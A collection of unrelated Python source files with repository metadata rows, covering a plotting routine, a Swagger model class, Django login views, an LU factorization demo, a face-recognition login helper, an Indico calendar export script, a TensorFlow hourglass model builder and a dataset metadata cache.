y = asndvar(y, sub, ds)
if x is not None:
x = ascategorial(x, sub, ds)
y = y.aggregate(x)
# find plotting dims
if xdim is None and y.has_dim('time'):
ydim, xdim = y.get_dimnames((None, 'time'))
else:
ydim, xdim = y.get_dimnames((None, xdim))
xdim_obj = y.get_dim(xdim)
# get data
ydata = y.get_data((ydim, xdim))
if isinstance(offset, str):
offset = eval(offset, {'y': y})
# find cells
if x is None:
cells = y.get_dim(ydim)
cell_labels = tuple(map(str, cells))
else:
cells = cell_labels = x.cells
if order is not None:
sort_index = [cells._array_index(i) for i in order]
ydata = ydata[sort_index]
cells = tuple(cells[i] for i in sort_index)
cell_labels = tuple(cell_labels[i] for i in sort_index)
if ylabel is True:
_, ylabel = find_axis_params_data(y, ylabel)
epochs = ((y,),)
ny = len(ydata)
xdata = repeat(xdim_obj._axis_data(), ny)
offsets = np.arange(ny - 1, -1, -1) * offset
if ylabels is True:
ylabels = cell_labels
# colors
if colors is None:
color_iter = repeat('k', ny)
elif isinstance(colors, dict):
color_iter = (colors[cell] for cell in cells)
elif len(colors) < ny:
color_iter = cycle(colors)
else:
color_iter = colors
layout = Layout(1, 2. / ny, 6, *args, **kwargs)
EelFigure.__init__(self, frame_title(y, x), layout)
ax = self._axes[0]
handles = [ax.plot(x_, y_ + offset_, color=color, clip_on=clip)[0] for
x_, y_, offset_, color in
zip(xdata, ydata, offsets, color_iter)]
if ylim is None:
ymin = min(y.min() for y in ydata) if isinstance(ydata, tuple) else ydata.min()
ylim = (min(0, ydata[-1].min()) - 0.1 * offset,
offset * (ny - 0.9) + max(0, ydata[0].max()))
else:
ymin, ymax = ylim
ylim = (ymin, offset * (ny - 1) + ymax)
ax.grid(True)
ax.set_frame_on(False)
ax.xaxis.set_ticks_position('none')
ax.yaxis.set_ticks_position('none')
ax.set_yticks(offsets)
ax.set_yticklabels(ylabels or (), va='center' if ymin < 0 else 'baseline')
ax.set_ylim(ylim)
self._configure_xaxis_dim(xdim_obj, xlabel, xticklabels)
if ylabel:
ax.set_ylabel(ylabel)
XAxisMixin._init_with_data(self, epochs, xdim, xlim)
LegendMixin.__init__(self, legend, dict(zip(cell_labels, handles)))
self._show()
|
[
"christianmbrodbeck@gmail.com"
] |
christianmbrodbeck@gmail.com
|
42a601ec67877ad564b2a27019c601b1b6d54007
|
ce6cb09c21470d1981f1b459293d353407c8392e
|
/lib/jnpr/healthbot/swagger/models/devicegroup_schema_logging_syslog.py
|
39bcac4a8b3a6a430adb23b8b3c466be84056209
|
[
"Apache-2.0"
] |
permissive
|
minefuto/healthbot-py-client
|
c4be4c9c3153ef64b37e5344bf84154e93e7b521
|
bb81452c974456af44299aebf32a73abeda8a943
|
refs/heads/master
| 2022-12-04T07:47:04.722993
| 2020-05-13T14:04:07
| 2020-05-13T14:04:07
| 290,145,286
| 0
| 0
|
Apache-2.0
| 2020-08-25T07:27:54
| 2020-08-25T07:27:53
| null |
UTF-8
|
Python
| false
| false
| 4,871
|
py
|
# coding: utf-8
"""
Healthbot APIs
API interface for Healthbot application # noqa: E501
OpenAPI spec version: 1.0.0
Contact: healthbot-hackers@juniper.net
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
import pprint
import re # noqa: F401
import six
class DevicegroupSchemaLoggingSyslog(object):
"""NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'daemons': 'list[str]',
'log_level': 'str'
}
attribute_map = {
'daemons': 'daemons',
'log_level': 'log-level'
}
def __init__(self, daemons=None, log_level=None): # noqa: E501
"""DevicegroupSchemaLoggingSyslog - a model defined in Swagger""" # noqa: E501
self._daemons = None
self._log_level = None
self.discriminator = None
if daemons is not None:
self.daemons = daemons
self.log_level = log_level
@property
def daemons(self):
"""Gets the daemons of this DevicegroupSchemaLoggingSyslog. # noqa: E501
:return: The daemons of this DevicegroupSchemaLoggingSyslog. # noqa: E501
:rtype: list[str]
"""
return self._daemons
@daemons.setter
def daemons(self, daemons):
"""Sets the daemons of this DevicegroupSchemaLoggingSyslog.
:param daemons: The daemons of this DevicegroupSchemaLoggingSyslog. # noqa: E501
:type: list[str]
"""
allowed_values = ["ingest", "tand", "publishd"] # noqa: E501
if not set(daemons).issubset(set(allowed_values)):
raise ValueError(
"Invalid values for `daemons` [{0}], must be a subset of [{1}]" # noqa: E501
.format(", ".join(map(str, set(daemons) - set(allowed_values))), # noqa: E501
", ".join(map(str, allowed_values)))
)
self._daemons = daemons
@property
def log_level(self):
"""Gets the log_level of this DevicegroupSchemaLoggingSyslog. # noqa: E501
Set the logging level # noqa: E501
:return: The log_level of this DevicegroupSchemaLoggingSyslog. # noqa: E501
:rtype: str
"""
return self._log_level
@log_level.setter
def log_level(self, log_level):
"""Sets the log_level of this DevicegroupSchemaLoggingSyslog.
Set the logging level # noqa: E501
:param log_level: The log_level of this DevicegroupSchemaLoggingSyslog. # noqa: E501
:type: str
"""
if log_level is None:
raise ValueError("Invalid value for `log_level`, must not be `None`") # noqa: E501
allowed_values = ["error", "debug", "warn", "info"] # noqa: E501
if log_level not in allowed_values:
raise ValueError(
"Invalid value for `log_level` ({0}), must be one of {1}" # noqa: E501
.format(log_level, allowed_values)
)
self._log_level = log_level
def to_dict(self):
"""Returns the model properties as a dict"""
result = {}
for attr, _ in six.iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
if issubclass(DevicegroupSchemaLoggingSyslog, dict):
for key, value in self.items():
result[key] = value
return result
def to_str(self):
"""Returns the string representation of the model"""
return pprint.pformat(self.to_dict())
def __repr__(self):
"""For `print` and `pprint`"""
return self.to_str()
def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, DevicegroupSchemaLoggingSyslog):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
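A quick illustration (a sketch, assuming the generated class above is importable as-is):
syslog = DevicegroupSchemaLoggingSyslog(daemons=['ingest', 'tand'], log_level='info')
print(syslog.to_dict())  # {'daemons': ['ingest', 'tand'], 'log_level': 'info'}
# Assigning an unknown level raises: the setter validates against allowed_values.
# syslog.log_level = 'trace'  ->  ValueError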
|
[
"nitinkr@juniper.net"
] |
nitinkr@juniper.net
|
357714394ac3d126251c1f1d6028f9c3b887f31f
|
92b3ade5b69889b806f37c440ff7bbe9ad1e9ca9
|
/mysite/project/apps/myauth/views.py
|
1dba2ec8e0f00a539fef9d249c3270ae41be4ca3
|
[] |
no_license
|
BorisovDima/WebProject
|
4b468ed07555140890165954710185612d629ec9
|
e84e5e5d83028412bdfb8cb93c8ec0fde5c54980
|
refs/heads/master
| 2022-12-10T17:17:56.159721
| 2019-02-22T02:42:53
| 2019-02-22T02:42:53
| 160,443,451
| 0
| 0
| null | 2022-11-22T03:08:53
| 2018-12-05T01:43:46
|
Python
|
UTF-8
|
Python
| false
| false
| 3,505
|
py
|
from django.urls import reverse
from django.template.loader import render_to_string
from django.views.generic import CreateView, FormView, RedirectView
from django.contrib.auth import get_user_model
from django.contrib.auth.views import LoginView, LogoutView, PasswordResetView
from django.conf import settings
from django.utils.decorators import method_decorator
from django.views.decorators.http import require_POST
from django.shortcuts import get_object_or_404
from project.apps.account.mixins import NotLoginRequiredMixin
from project.apps.ajax_utils_.mixins import AjaxMixin
from .models import BanList
from .forms import MyRegForm
from .utils import handler_ip, set_geo
from project.apps.back_task.tasks import sendler_mail
@method_decorator(require_POST, name='dispatch')
class Registr(NotLoginRequiredMixin, AjaxMixin, CreateView):
captcha = True
def get_data(self, form):
return {'html': render_to_string('myauth/verify.html', {'user': form.instance.username,
'mail': form.instance.email})}
class Login(NotLoginRequiredMixin, LoginView):
def get_context_data(self, **kwargs):
context = super().get_context_data(**kwargs)
context['reg_form'] = MyRegForm()
return context
def post(self, req, *args, **kwargs):
self.ip = handler_ip(req)
self.ban_list, created = BanList.objects.get_or_create(ip=self.ip, defaults={'ip': self.ip})
status = self.ban_list.check_ban()
return super().post(req, *args, **kwargs) if status['status'] == 'ok' else status['response']
def form_valid(self, form):
self.ban_list.delete()
return super().form_valid(form)
def form_invalid(self, form):
self.ban_list.banned()
return super().form_invalid(form)
def get_success_url(self):
return reverse('account:profile', kwargs={'login': self.request.user.username})
class Logout(LogoutView): pass
class Vertify_account(RedirectView):
def get_redirect_url(self, *args, **kwargs):
user = get_object_or_404(get_user_model(), uuid=self.kwargs['uuid'], is_verified=False)
user.is_verified = True
user.save(update_fields=['is_verified'])
set_geo(user, self.request)
self.url = reverse('myauth:login')
return super().get_redirect_url(*args, **kwargs)
@method_decorator(require_POST, name='dispatch')
class ResetPass(AjaxMixin, PasswordResetView):
def get_data(self, form):
return {'html': render_to_string('myauth/reset_pass.html', {'email': form.cleaned_data['email']})}
class HelpLogin(NotLoginRequiredMixin, AjaxMixin, FormView):
captcha = True
def get_data(self, form):
return {'email': form.cleaned_data['email']}
def form_valid(self, form):
res = super().form_valid(form)
if res.status_code == 200:
user = get_user_model().objects.filter(email=form.cleaned_data['email'])
if user and not user.first().is_verified:
user = user.first()
kwargs = {'link': 'http://localhost%s' % reverse('myauth:verify', kwargs={'uuid': user.uuid}),
'user': user.username}
sendler_mail.delay('', '', settings.DEFAULT_FROM_EMAIL, [user.email],
template_name='back_task/mail_registr.html', **kwargs)
return res
|
[
"you@example.com"
] |
you@example.com
|
a129616b2d8205c61a851bfcdd1eb74d7f79d46e
|
7db3916d8ac8a66a954d230e43bb74b37f81357c
|
/04day/04-私有属性.py
|
6736df4df214cab944cec7f434b9bcd4fc74452e
|
[] |
no_license
|
2001128/2_1805
|
2fc96bc6f8e2afcd9d4743891ecd87b754c28cc8
|
b3d4bfab2703a7c6aa1c280669376efeab28cad1
|
refs/heads/master
| 2020-03-22T20:53:14.903808
| 2018-07-30T06:04:49
| 2018-07-30T06:04:49
| 140,639,052
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 285
|
py
|
class Father():
    def __init__(self):
        self.__count = 3  # number of objects handled (private attribute)
    def getCount(self):
        return self.__count
    def setCount(self, count):
        self.__count = count
f = Father()
# f.__count = 10    # would only create a new, unrelated attribute on f
# print(f.__count)  # AttributeError if the assignment above stays commented out
f.setCount(20)
print(f.getCount())
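The mangled name remains reachable, which is handy when debugging (a one-line demonstration on the instance above):
print(f._Father__count)  # 20 -- inside the class body, __count is rewritten to _Father__count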
|
[
"335775879@qq.com"
] |
335775879@qq.com
|
991d23daa0afbd61d11515d50d29b0a0a1b642f9
|
bcfbb49b054380db6e7aeadc2d4e62292b5307f9
|
/singh/ch6_4_lu_factorization/ex6_18_lu_factorization3.py
|
692e64036d5d8462dd770ddd094eadebbe9287ac
|
[] |
no_license
|
hiddenwaffle/Ax-equals-b
|
de82d43248962ae072fd8b8a0c9eab37b52fd472
|
e5f4e4ac5b928440ee557eff9cf4d4683b8f7e56
|
refs/heads/main
| 2023-04-15T11:24:51.010982
| 2021-04-28T18:31:00
| 2021-04-28T18:31:00
| 322,965,263
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 176
|
py
|
from sympy import *
A = Matrix([
[1, 4, 5, 3],
[5, 22, 27, 11],
[6, 19, 27, 31],
[5, 28, 35, -8]
])
L, U, _ = A.LUdecomposition()
pprint([L, U])
pprint(L * U)
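A quick sanity check (a sketch; this matrix needs no row swaps, so the returned permutation is empty and the factors multiply back exactly):
assert L * U == A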
|
[
"hiddenwaffle@users.noreply.github.com"
] |
hiddenwaffle@users.noreply.github.com
|
0358e81903c9f25adf5e47fa32c43ed72879f3a9
|
ac60e6e0bede04f3897c2a9806d4b0909abfea31
|
/flaskblog/recognizer.py
|
34693038bff7a781dd4286b0a168f7272b2b99e4
|
[] |
no_license
|
teja0508/Web-App-with-Face-Verification-Login-System
|
35c387becbc99e37a58d8ae858b48ac31595a6d1
|
6da47d7e5a15a0f32751511d2e1c99be57d0894e
|
refs/heads/master
| 2022-11-18T09:12:54.284572
| 2020-07-03T05:48:32
| 2020-07-03T05:48:32
| 276,817,914
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,124
|
py
|
import face_recognition
import numpy as np
import cv2
import os
def Recognizer():
video = cv2.VideoCapture(0)
known_face_encodings = []
known_face_names = []
base_dir = os.path.dirname(os.path.abspath(__file__))
image_dir = os.path.join(base_dir, "static")
image_dir = os.path.join(image_dir, "profile_pics")
names = []
for root,dirs,files in os.walk(image_dir):
for file in files:
if file.endswith('jpg') or file.endswith('png'):
path = os.path.join(root, file)
img = face_recognition.load_image_file(path)
# label = file[:len(file)-4]
label = file
if label == 'default.jpg':
pass
else:
img_encoding = face_recognition.face_encodings(img)[0]
known_face_names.append(label)
known_face_encodings.append(img_encoding)
face_locations = []
face_encodings = []
while True:
check, frame = video.read()
small_frame = cv2.resize(frame, (0,0), fx=0.5, fy= 0.5)
rgb_small_frame = small_frame[:,:,::-1]
face_locations = face_recognition.face_locations(rgb_small_frame)
face_encodings = face_recognition.face_encodings(rgb_small_frame, face_locations)
face_names = []
for face_encoding in face_encodings:
matches = face_recognition.compare_faces(known_face_encodings, np.array(face_encoding), tolerance = 0.5)
face_distances = face_recognition.face_distance(known_face_encodings,face_encoding)
best_match_index = np.argmin(face_distances)
if matches[best_match_index]:
name = known_face_names[best_match_index]
face_names.append(name)
if name not in names:
names.append(name)
for (top,right,bottom,left), name in zip(face_locations, face_names):
top*=2
right*=2
bottom*=2
left*=2
cv2.rectangle(frame, (left,top),(right,bottom), (0,255,0), 2)
# cv2.rectangle(frame, (left, bottom - 30), (right,bottom - 30), (0,255,0), -1)
# font = cv2.FONT_HERSHEY_DUPLEX
# cv2.putText(frame, name, (right - int(right / 4), bottom - 10), font, 0.8, (255,255,255),1)
cv2.imshow("Face Recognition Panel",frame)
        cv2.waitKey(5000)  # show the frame for up to 5 seconds
        break  # one recognized frame is enough; names were collected above
video.release()
cv2.destroyAllWindows()
return names
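Typical use (illustrative; the call blocks while the webcam window is open):
recognized = Recognizer()
print(recognized)  # e.g. ['alice.jpg', 'bob.png'] -- profile-picture filenames double as labels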
|
[
"lchandratejareddy@gmail.com"
] |
lchandratejareddy@gmail.com
|
6a630ade66aaaa5fc763aabec423966dac49db2d
|
9908afd9f51caa50d0204f43cd658ab558694d45
|
/gits-find.py
|
3c2058e0f2adebbf1e156bad76ebca4dd6c47154
|
[
"MIT"
] |
permissive
|
furas/python-git
|
351289b59037ec6f6ac54d3f28e50facd350e753
|
9ce447b05a59c31459e0005526ffc21ba5fafaca
|
refs/heads/master
| 2021-03-19T16:46:22.405785
| 2017-12-01T20:40:19
| 2017-12-01T20:40:19
| 101,456,771
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 168
|
py
|
import os
#path = os.path.expanduser('~')
path = os.path.expandvars('$HOME')
for root, folders, files in os.walk(path):
if '.git' in folders:
print(root)
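An equivalent sketch using pathlib (same traversal, assuming the repositories live under $HOME):
from pathlib import Path
for git_dir in Path.home().rglob('.git'):
    print(git_dir.parent)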
|
[
"furas@tlen.pl"
] |
furas@tlen.pl
|
fa38461ea17f79f0bbde5f9888ee3584bc8e2702
|
dec691f24a5a8c204c9394778d237ee83c48ac94
|
/indicoExport/caleventexport.py
|
59d30b50a8ac2defb9d87d549b165a7f64fd505e
|
[] |
no_license
|
sgnoohc/login
|
c94eafd6bfb81224f6943cd807a455f5a48085ae
|
cdf3e08b721e6659e8122df46b2c08638bfde3c2
|
refs/heads/master
| 2021-01-19T23:01:12.526630
| 2017-09-22T16:57:45
| 2017-09-22T16:57:45
| 88,910,252
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 1,693
|
py
|
#!/bin/env python
# script to download from indico the ics files you want
# ==================================================
# code starts here
# ==================================================
import hashlib
import hmac
import urllib.parse
import time
import os
import sys
def build_indico_request(path, params, api_key=None, secret_key=None, only_public=False, persistent=False):
    items = list(params.items()) if hasattr(params, 'items') else list(params)
if api_key:
items.append(('apikey', api_key))
if only_public:
items.append(('onlypublic', 'yes'))
if secret_key:
if not persistent:
items.append(('timestamp', str(int(time.time()))))
items = sorted(items, key=lambda x: x[0].lower())
        url = '%s?%s' % (path, urllib.parse.urlencode(items))
        signature = hmac.new(secret_key.encode(), url.encode(), hashlib.sha1).hexdigest()
        items.append(('signature', signature))
if not items:
return path
    return '%s?%s' % (path, urllib.parse.urlencode(items))
if __name__ == '__main__':
API_KEY = '35129c98-2ccc-4412-a331-d6a17d7de85e' # From the https://indico.cern.ch/user/api/, copy the content in the field "Token"
SECRET_KEY = 'ffd7251b-7ff3-493c-953a-d389bb7ba0a6' # From the https://indico.cern.ch/user/api/, copy the content in the field "Secret"
PATH = '/export/event/%s.ics'%(sys.argv[1])
PARAMS = {
# 'limit': 100,
# 'detail': 'sessions',
# 'detail': 'sessions',
# 'detail': 'events',
}
url = 'https://indico.cern.ch%s'%build_indico_request(PATH, PARAMS, API_KEY, SECRET_KEY)
command = "curl -s -o event.ics -O '%s' "%(url)
    print(command)
os.system(command)
#eof
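Usage (illustrative; the positional argument is the numeric Indico event id, and 123456 is a made-up example):
  python caleventexport.py 123456   # downloads the event's calendar to event.ics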
|
[
"sgnoohc@gmail.com"
] |
sgnoohc@gmail.com
|
81aa2ee36e3ae549fea5d72bdca67d1626f824c9
|
fbf254edbd7af1f83e074ac6b574442d32b57b9d
|
/leetcodeProblems/gas_station.py
|
3fc728f7e31a4829b05c81044f5652344d6da79c
|
[] |
no_license
|
Madhivarman/DataStructures
|
cc55456d2dc7d276d364c67f3c0b74f6e0ac3a6e
|
f42d71c7c404c72a31b69d37e459f7d7ae9bfe25
|
refs/heads/master
| 2022-05-08T18:18:29.910621
| 2022-03-28T07:24:55
| 2022-03-28T07:24:55
| 133,028,620
| 4
| 0
| null | 2019-11-23T14:58:16
| 2018-05-11T10:57:04
|
Python
|
UTF-8
|
Python
| false
| false
| 1,063
|
py
|
"""
Problem Statement:
There are N gas stations along a circular route, where the amount of gas at station i is gas[i].
You have a car with an unlimited gas tank and it costs cost[i] of gas to travel from station i to its next station (i+1). You
begin the journey with an empty tank at one of the gas stations.
Return the starting gas station's index if you can travel around the circuit once in the clockwise direction, otherwise return -1.
Note:
If there exists a solution, it is guaranteed to be unique.
Both input arrays are non-empty and have the same length.
Each element in the input arrays is a non-negative integer.
"""
class Solution:
def canCompleteCircuit(self, gas, cost):
gas_tank, start_station = 0, 0
if sum(gas) < sum(cost):
return -1
for i in range(len(gas)):
gas_tank += gas[i] - cost[i]
if gas_tank < 0:
start_station = i + 1
gas_tank = 0
return start_station
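For example, on the sample input from the problem statement, the unique valid start is station 3:
print(Solution().canCompleteCircuit([1, 2, 3, 4, 5], [3, 4, 5, 1, 2]))  # 3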
|
[
"noreply@github.com"
] |
Madhivarman.noreply@github.com
|
8a0d2a0618ff00ce1f4cd0197b13da15959da76a
|
2f63688febd21dc3ae6b19abfa79ad313c820154
|
/1368_Minimum_Cost_to_Make_at_Least_One_Valid_Path_in_a_Grid/try_2.py
|
dd920daca99b0c539180370abf6f9d628c951810
|
[] |
no_license
|
novayo/LeetCode
|
cadd03587ee4ed6e35f60294070165afc1539ac8
|
54d0b3c237e0ffed8782915d6b75b7c6a0fe0de7
|
refs/heads/master
| 2023-08-14T00:35:15.528520
| 2023-07-30T05:56:05
| 2023-07-30T05:56:05
| 200,248,146
| 8
| 1
| null | 2022-11-19T04:37:54
| 2019-08-02T14:24:19
|
Python
|
UTF-8
|
Python
| false
| false
| 1,748
|
py
|
import collections
import heapq
from typing import List
class Solution:
    def minCost(self, grid: List[List[int]]) -> int:
        '''
        Each pop takes the entry with the smallest hand-rolled heap key
        (cost weighted lightly, plus the cell coordinates). At every cell
        the arrow can be kept for free or changed for cost 1. Cells may be
        reached repeatedly, so a dict keeps the best key seen so far;
        entries are compared against it before pushing and again on pop.
        '''
        def getPos(x, y, move):
            if move == 1:
                y += 1
            elif move == 2:
                y -= 1
            elif move == 3:
                x += 1
            else:
                x -= 1
            return x, y
        def heuristic(i, j, cost):
            return cost * 0.1 + i + j
        height = len(grid)
        width = len(grid[0])
        table = collections.defaultdict(lambda: float('inf'))
        heap = [(heuristic(0, 0, 0), 0, 0, 0)]
        while heap:
            h, cost, i, j = heapq.heappop(heap)
            if i == height - 1 and j == width - 1:
                return cost
            # re-check against the table after popping
            if h >= table[i, j]:
                continue
            else:
                table[i, j] = h
            for move in range(1, 5):
                x, y = getPos(i, j, move)
                if 0 <= x < height and 0 <= y < width and table[x, y] > heuristic(x, y, cost):
                    if move == grid[i][j]:
                        heapq.heappush(heap, (heuristic(x, y, cost), cost, x, y))
                    else:
                        heapq.heappush(heap, (heuristic(x, y, cost + 1), cost + 1, x, y))
        return -1
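A smoke test against the problem's published samples (the expected values come from the problem statement; this experimental heuristic is not guaranteed to match them on every input):
s = Solution()
print(s.minCost([[1, 1, 3], [3, 2, 2], [1, 1, 4]]))  # sample answer: 0
print(s.minCost([[1, 2], [4, 3]]))                   # sample answer: 1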
|
[
"f14051172@gs.ncku.edu.tw"
] |
f14051172@gs.ncku.edu.tw
|
282061daa67fa2c6724f19e0f19560f2cfe09b3a
|
24eff244d3a5327d79ae6244f748b7689c43ad5e
|
/tfmodules/model/model_builder.py
|
29daaddfe4778d8ba8b1a4edacea3ff7ba83bf60
|
[
"Apache-2.0"
] |
permissive
|
motlabs/dont-be-turtle
|
e41a3d532169abdf2cf89dca9067c50da7ba08e8
|
bd754736ea6caa3ccd58866657d97112f4bcf1cf
|
refs/heads/develop
| 2022-12-12T12:22:20.770696
| 2018-12-02T15:16:40
| 2018-12-02T15:16:40
| 129,588,368
| 33
| 5
|
Apache-2.0
| 2022-11-22T02:48:39
| 2018-04-15T07:47:18
|
Python
|
UTF-8
|
Python
| false
| false
| 6,184
|
py
|
# Copyright 2018 Jaewook Kang (jwkang10@gmail.com)
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ===================================================================================
# -*- coding: utf-8 -*-
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
from hourglass_layer import get_hourglass_layer
from reception_layer import get_reception_layer
from supervision_layer import get_supervision_layer
from output_layer import get_output_layer
def get_model(ch_in,model_config,scope=None):
'''
ch_in (256x256x3) -->
reception layer (64x64x256) -->
hourglass layer (64x64x256) -->
output layer (64x64x3) -->
loss
'''
net = ch_in
end_points = {}
orig_scope = scope
with tf.variable_scope(name_or_scope=scope,default_name='model',values=[ch_in]) as sc:
scope = 'reception'
tf.logging.info('-----------------------------------------------------------')
tf.logging.info('[model_builder] model in shape=%s' % ch_in.get_shape().as_list() )
with tf.variable_scope(name_or_scope=scope, default_name='reception', values=[net]):
net,end_points_recept, _= get_layer(ch_in = net,
model_config = model_config.rc_config,
layer_type = scope)
end_points.update(end_points_recept)
tf.logging.info('[model_builder] reception out shape=%s' % net.get_shape().as_list() )
scope = 'stacked_hg'
intermediate_heatmaps = []
with tf.variable_scope(name_or_scope=scope, default_name='stacked_hg', values=[net]):
for stacking_index in range(0,model_config.num_of_hgstacking):
            shortcut = net
# hourglass layer
net, end_points_hg, _ = get_layer(ch_in = net,
model_config = model_config.hg_config,
layer_index = stacking_index,
layer_type = 'hourglass')
end_points.update(end_points_hg)
tf.logging.info('[model_builder] hourglass%d out shape=%s' % (stacking_index,
net.get_shape().as_list()))
if stacking_index < model_config.num_of_hgstacking - 1:
# supervision layer
net, end_points_sv,heatmaps = get_layer(ch_in = net,
model_config = model_config.sv_config,
layer_index = stacking_index,
layer_type = 'supervision')
end_points.update(end_points_sv)
tf.logging.info('[model_builder] supervision%d out shape=%s' % (stacking_index,
net.get_shape().as_list()))
# intermediate heatmap save
intermediate_heatmaps.append(heatmaps)
# shortcut sum
            net = tf.add(x=net, y=shortcut,
                         name='shortcut_sum' + str(stacking_index))
# output layer
scope = 'output'
with tf.variable_scope(name_or_scope=scope, default_name='output', values=[net]):
net, end_point_out, _ = get_layer(ch_in = net,
model_config = model_config.out_config,
layer_type = scope)
end_points.update(end_point_out)
tf.logging.info('[model_builder] model out shape=%s' % net.get_shape().as_list())
tf.logging.info('-----------------------------------------------------------')
out = tf.identity(input=net, name= sc.name + '_out')
end_points[sc.name + '_out'] = out
end_points[sc.name + '_in'] = ch_in
tf.logging.info('[model_builder] building hg model complete')
return out, intermediate_heatmaps, end_points
def get_layer(ch_in,
model_config,
layer_index=0,
layer_type='hourglass'):
net = ch_in
end_points = {}
heatmaps_out = None
if layer_type == 'hourglass':
net, end_points = get_hourglass_layer(ch_in=net,
model_config=model_config,
layer_index=layer_index,
scope=layer_type)
    elif layer_type == 'supervision':
net, end_points, heatmaps_out = get_supervision_layer(ch_in=net,
model_config=model_config,
layer_index=layer_index,
scope=layer_type)
    elif layer_type == 'reception':
net, end_points = get_reception_layer(ch_in=net,
model_config=model_config,
scope=layer_type)
    elif layer_type == 'output':
net, end_points = get_output_layer(ch_in=net,
model_config=model_config,
scope=layer_type)
return net, end_points, heatmaps_out
|
[
"jwkang10@gmail.com"
] |
jwkang10@gmail.com
|
53287ca13c22599139bdaa837069e8b398154f5d
|
8f3ceff01367c4550b2dd71f65af70c28bf8eed1
|
/GenericViewCRUD/products/forms.py
|
4efdd9fa21f8e4f628acf149cff5aff3da40856b
|
[] |
no_license
|
anupjungkarki/ClassBasedVIEW-and-GenericVIEW-CRUD
|
53110379420fca90cceec58c221e51f6523392a0
|
ed99e50fab8b531d9a2167b11eb4eee8cc439351
|
refs/heads/master
| 2023-02-13T16:32:33.930218
| 2021-01-07T09:22:44
| 2021-01-07T09:22:44
| 327,561,635
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 198
|
py
|
from django import forms
from .models import Product
class ProductForm(forms.ModelForm):
class Meta:
model = Product
fields = ['name', 'slug', 'description', 'image', 'price']
|
[
"anupkarki2012@gmail.com"
] |
anupkarki2012@gmail.com
|
9785f44eadbf85ca4d7a7c30a7ebc249dffeaa30
|
f7aa321f384c6a052e0a88e2adaea9bea2c5f7a6
|
/geophys_utils/dataset_metadata_cache/_dataset_metadata_cache.py
|
ba9a6bd7f3010369dfd6fff1306bd62c7d158947
|
[
"Apache-2.0"
] |
permissive
|
alex-ip/geophys_utils
|
4af3637b6d47b818106ddfb0a11b3230992dcf71
|
bcbf4205b7b06d88a26adfe0c4da036d54425751
|
refs/heads/master
| 2023-07-05T20:22:31.889192
| 2023-05-09T07:03:22
| 2023-05-09T07:03:22
| 226,753,773
| 2
| 0
|
Apache-2.0
| 2019-12-09T00:37:35
| 2019-12-09T00:37:35
| null |
UTF-8
|
Python
| false
| false
| 5,203
|
py
|
'''
Created on 19 Jul. 2018
@author: Alex Ip
'''
import abc
import logging
import os
import yaml
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO) # Initial logging level for this module
settings = yaml.safe_load(open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'dataset_metadata_cache_settings.yml')))
class Distribution(object):
'''
Distribution class definition
'''
def __init__(self,
url,
protocol
):
'''
Distribution class Constructor
'''
self.url = url
self.protocol = protocol
class Dataset(object):
'''
Dataset class definition
'''
def __init__(self,
dataset_title,
ga_survey_id,
longitude_min,
longitude_max,
latitude_min,
latitude_max,
convex_hull_polygon,
keyword_list,
distribution_list,
point_count,
metadata_uuid=None,
start_date=None,
end_date=None
):
'''
Dataset class Constructor
'''
self.dataset_title = dataset_title
self.ga_survey_id = ga_survey_id
self.longitude_min = longitude_min
self.longitude_max = longitude_max
self.latitude_min = latitude_min
self.latitude_max = latitude_max
self.convex_hull_polygon = convex_hull_polygon
self.metadata_uuid = metadata_uuid
self.keyword_list = keyword_list
self.distribution_list = distribution_list
self.point_count = point_count
self.start_date = start_date
self.end_date = end_date
class DatasetMetadataCache(object):
'''
DatasetMetadataCache class definition
'''
# Tuple containing field names for results of search_dataset_distributions function
dataset_distribution_search_fields = ('ga_survey_id',
'dataset_title',
'distribution_url',
'convex_hull_polygon',
'longitude_min',
'longitude_max',
'latitude_min',
'latitude_max',
'point_count',
'start_date',
'end_date',
'metadata_uuid'
)
_db_engine = None
@abc.abstractmethod
def __init__(self, debug):
'''
DatasetMetadataCache class Constructor
@parameter debug: Boolean flag indicating whether debug output is required
'''
# Initialise and set debug property
self._debug = None
self.debug = debug
@abc.abstractmethod
def add_dataset(self, dataset):
'''
Function to insert or update dataset record
'''
return
@abc.abstractmethod
def add_survey(self,
ga_survey_id,
survey_name=None
):
'''
Function to insert survey if necessary
'''
return
@abc.abstractmethod
def add_keywords(self,
dataset_id,
keyword_list):
'''
Function to insert new keywords
'''
return
@abc.abstractmethod
def add_distributions(self,
dataset_id,
distribution_list):
'''
Function to insert new distributions
'''
return
@abc.abstractmethod
def search_dataset_distributions(self,
keyword_list,
protocol,
ll_ur_coords=None
):
'''
Function to return list of dicts containing metadata for all datasets with specified keywords and bounding box
Note that keywords are searched exclusively, i.e. using "and", not "or"
'''
return
@property
def db_engine(self):
return type(self)._db_engine
@property
def debug(self):
return self._debug
@debug.setter
def debug(self, debug_value):
if self._debug != debug_value or self._debug is None:
